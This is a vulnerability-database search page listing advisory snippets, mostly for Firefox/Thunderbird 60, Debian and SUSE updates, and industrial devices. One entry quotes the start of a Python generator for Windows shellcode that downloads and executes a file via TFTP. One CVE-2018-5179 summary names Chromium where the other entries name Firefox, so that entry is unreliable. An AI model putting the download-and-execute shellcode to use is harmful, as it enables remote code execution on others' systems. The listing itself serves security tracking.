Lucene search
K

226 matches found

CNVD
CNVD
added 2019/12/02 12:0 a.m.1 views

Inateck BCST-60 Barcode Scanner Keystroke Injection Vulnerability

The Inateck BCST-60 is a barcode scanner that can be used wirelessly using 2.4 GHz radio communication or wired via USB. The Inateck BCST-60 Barcode Scanner suffers from a keystroke injection vulnerability that can be exploited by an attacker to send packets of data to a target system's USB...

10CVSS7.4AI score0.01998EPSS
Exploits0References1
Debian
Debian
added 2019/11/17 9:55 p.m.85 views

[SECURITY] [DSA 4571-1] thunderbird security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4571-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff November 17, 2019 https://www.debian.org/security/faq -...

8.8CVSS8.6AI score0.06707EPSS
Exploits2
Tenable Nessus
Tenable Nessus
added 2019/11/05 12:0 a.m.121 views

Solaris 10 (sparc) : 125719-60

X11 6.8.0: Xorg server patch. Date this patch was last updated by Sun : Nov/04/19 C Tenable Network Security, Inc. The descriptive text in this plugin was extracted from the Oracle SunOS Patch Updates. include'compat.inc'; if description scriptid130509; scriptversion"1.4";...

9.3CVSS9.3AI score0.05332EPSS
Exploits7References7
RedHat Linux
RedHat Linux
added 2019/07/11 6:17 p.m.5 views

Mozilla: Caret character improperly escaped in origins

A vulnerability exists where the caret "^" character is improperly escaped constructing some URIs due to it being used as a separator, allowing for possible spoofing of origin attributes. This vulnerability affects Firefox ESR 60.8, Firefox 68, and Thunderbird 60.8...

5.3CVSS7.3AI score0.02131EPSS
Exploits1References5
Tenable Nessus
Tenable Nessus
added 2019/05/31 12:0 a.m.11 views

Schneider Electric Altivar ATV930D45M3C Variable Speed Drive

Binary data 764314.prm...

7.3AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2019/05/31 12:0 a.m.16 views

Schneider Electric Altivar ATV930D45M3 Variable Speed Drive

Binary data 764313.prm...

7.3AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2019/05/08 12:0 a.m.12 views

Rockwell Automation ArmorPoint Chassis 60 Slot 1738 Chassis 60

Binary data 753701.prm...

7.3AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2019/05/08 12:0 a.m.14 views

Rockwell Automation PointIO Chassis 60 Slot 1734 Chassis 60

Binary data 753621.prm...

7.3AI score
Exploits0References1
UbuntuCve
UbuntuCve
added 2019/04/26 2:29 p.m.31 views

CVE-2018-5179

A service worker can send the activate event on itself periodically which allows it to run perpetually, allowing it to monitor activity by users. Affects all versions prior to Firefox 60...

7.5CVSS7.1AI score0.01489EPSS
Exploits0References1
NVD
NVD
added 2019/04/26 2:29 p.m.15 views

CVE-2018-5179

A service worker can send the activate event on itself periodically which allows it to run perpetually, allowing it to monitor activity by users. Affects all versions prior to Firefox 60...

7.5CVSS7.7AI score0.01489EPSS
Exploits0References1
Prion
Prion
added 2019/04/26 2:29 p.m.17 views

Code injection

A service worker can send the activate event on itself periodically which allows it to run perpetually, allowing it to monitor activity by users. Affects all versions prior to Firefox 60...

5CVSS8.1AI score0.01489EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2019/04/26 1:55 p.m.19 views

CVE-2018-5179

A service worker can send the activate event on itself periodically which allows it to run perpetually, allowing it to monitor activity by users. Affects all versions prior to Firefox 60...

6.9AI score0.01489EPSS
Exploits0References1
CVE
CVE
added 2019/04/26 1:55 p.m.136 views

CVE-2018-5179

Affected software: Chromium/Google Chrome (browser). Issue: CVE-2018-5179, within the ServiceWorker implementation, where the update() path could run indefinitely due to insufficient limits. Cause: described as an error in the ServiceWorker component; multiple vendor advisories map this CVE to pr...

7.5CVSS6.7AI score0.01489EPSS
Exploits0References1Affected Software1
Debian CVE
Debian CVE
added 2019/04/26 1:55 p.m.53 views

CVE-2018-5179

Removed by vendor...

7.5CVSS8.6AI score0.01489EPSS
Exploits0
0day.today
0day.today
added 2019/01/12 12:0 a.m.790 views

Windows/x86 - Download With TFTP And Execute Shellcode (Generator) (51-60 bytes)

!/bin/python Author: Semen Alexandrovich Lyhin. https://www.linkedin.com/in/semenlyhin/ This script generates x86 shellcode to download and execute .exe file via tftp. File name should be equal to: "1.exe" Lenght: 51-56 bytes, zero-free. import sys def GetOpcodesip,addr: command = r"tftp -i " + i...

7.4AI score
Exploits0
Prion
Prion
added 2018/12/13 10:29 p.m.20 views

Authorization

Cloud Foundry UAA, versions 60 prior to 66.0, contain an authorization logic error. In environments with multiple identity providers that contain accounts across identity providers with the same username, a remote authenticated user with access to one of these accounts may be able to obtain a tok...

4CVSS8.2AI score0.01782EPSS
Exploits0References3Affected Software1
ALT Linux
ALT Linux
added 2018/12/06 12:0 a.m.63 views

Security fix for the ALT Linux 9 package polkit version 0.115-alt4

Dec. 6, 2018 Alexey Shabalin 0.115-alt4 - updated to 0.115-23fd211e - Port the JS authority to mozjs-60 - Move D-Bus policy file to /usr/share/dbus-1/system.d/ - Drop deprecated use of gtypeclassaddprivate - Allow negative uids/gids in PolkitUnixUser and Group objects fixed CVE-2018-19788...

9CVSS8.7AI score0.11483EPSS
Exploits1
OSV
OSV
added 2018/12/05 9:30 a.m.9 views

SUSE-SU-2018:3591-2 Security update for MozillaFirefox, MozillaFirefox-branding-SLE, llvm4, mozilla-nspr, mozilla-nss, apache2-mod_nss

This update for MozillaFirefox to ESR 60.2.2 fixes several issues. These general changes are part of the version 60 release. - New browser engine with speed improvements - Redesigned graphical user interface elements - Unified address and search bar for new installations - New tab page listing to...

9.8CVSS7.6AI score0.13417EPSS
Exploits8References38
The Hacker News
The Hacker News
added 2018/11/22 11:19 a.m.258 views

US Postal Service Left 60 Million Users Data Exposed For Over a Year

The United States Postal Service has patched a critical security vulnerability that exposed the data of more than 60 million customers to anyone who has an account at the USPS.com website. The U.S.P.S. is an independent agency of the American federal government responsible for providing postal...

7.4AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2018/11/13 12:0 a.m.45 views

Debian DLA-1575-1 : thunderbird security update

Multiple security issues have been found in Thunderbird: Multiple memory safety errors and use-after-frees may lead to the execution of arbitrary code or denial of service. Debian follows the Thunderbird upstream releases. Support for the 52.x series has ended, so starting with this update we're...

9.8CVSS7.5AI score0.03924EPSS
Exploits6References19
Rows per page
Query Builder